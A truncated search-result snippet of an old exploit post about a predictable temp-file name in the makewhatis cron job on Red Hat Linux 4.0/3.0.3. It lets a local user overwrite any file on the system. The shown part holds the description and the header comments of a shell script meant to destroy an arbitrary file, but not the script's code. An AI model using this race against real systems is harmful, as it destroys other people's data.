search for: blowitawaysam

...serious problem with the makewhatis cronjob under Redhat Linux 4.0/3.0.3. You can use it to overwrite any file on the system. Redhat is aware of the problem, and said they would have some kind of fix by next week which should be plenty of time before this bug is exploitable again. #!/bin/sh # # blowitawaysam # # makewhatis is a shellscript that stores a tmp copy of the whatis # database in /tmp/whatis[PID]. This is easily predictable, and even # more easily brute forced. # # really silly script to blow away a file on redhat 3.0.3/4.0 system # with makewhatis in /etc/crontab. Severely limited as you c...